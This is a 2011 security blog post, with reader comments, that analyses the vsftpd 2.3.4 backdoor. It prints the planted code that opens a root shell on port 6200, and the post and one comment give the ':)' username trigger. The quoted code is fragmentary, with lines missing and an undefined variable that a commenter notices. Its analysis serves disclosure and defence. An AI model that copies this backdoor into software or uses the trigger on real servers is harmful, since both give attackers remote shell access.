xorl %eax, %eax

vsftpd 2.3.4 Backdoor

with 4 comments

This was a recent discovery by Chris Evans and you can read more details in his blog post available here. Furthermore, you can find information about this incident at The H Open as well as LWN.net websites.

So, the backdoor affects specifically 2.3.4 version of the popular FTP daemon and can be found in str.c file which contains code for handling the string manipulation routines.

str_contains_line(const struct mystr* p_str, const struct mystr* p_line_str)
  static struct mystr s_curr_line_str;
  unsigned int pos = 0;
  while (str_getline(p_str, &s_curr_line_str, &pos))
    if (str_equal(&s_curr_line_str, p_line_str))
      return 1;
    else if((p_str->p_buf[i]==0x3a)
    && (p_str->p_buf[i+1]==0x29))
  return 0;

Quite obvious. While parsing the received string values, if the string begins with “\x3A\x29” which in ASCII translates to ‘:)’ (a smiley face), it will invoke vsf_sysutil_extra().

This backdoor function was placed in sysdeputil.c file and looks like this:

  int fd, rfd;
  struct sockaddr_in sa;
  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  memset(&sa, 0, sizeof(sa));
  sa.sin_family = AF_INET;
  sa.sin_port = htons(6200);
  sa.sin_addr.s_addr = INADDR_ANY;
  if((bind(fd,(struct sockaddr *)&sa,
  sizeof(struct sockaddr))) < 0) exit(1);
  if((listen(fd, 100)) == -1) exit(1);
    rfd = accept(fd, 0, 0);
    close(0); close(1); close(2);
    dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
    execl("/bin/sh","sh",(char *)0); 

It simply opens a new TCP socket listening on port 6200 that will spawn a shell when connected to this port.

So, by using the ‘:)’ as username the attackers were able to trigger this backdoor in vsftpd 2.3.4.

Written by xorl

July 5, 2011 at 03:54

Posted in hax, security

4 Responses

Subscribe to comments with RSS.

  1. Minor quibble; the username has to start with a valid username character and anonymous-only mode must not be enabled. For example “X:)” works, but “:)” or “X :)” does not.


    July 6, 2011 at 17:11

  2. @HD: Thanks for the correction. :)


    July 6, 2011 at 19:06

  3. Excellent!
    I saw this article and I was like “Holy shit, I can’t believe that xorl is gonna talk about this fucking trivial backdoor” and you did.

    And not only that, you also managed to make a mistake.

    Great man!
    Keep it going!


    July 6, 2011 at 21:30

  4. hi,
    backdoor code is not complete since i variable in function str_contains_line does not defined.what is the true code?


    July 10, 2014 at 23:03

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: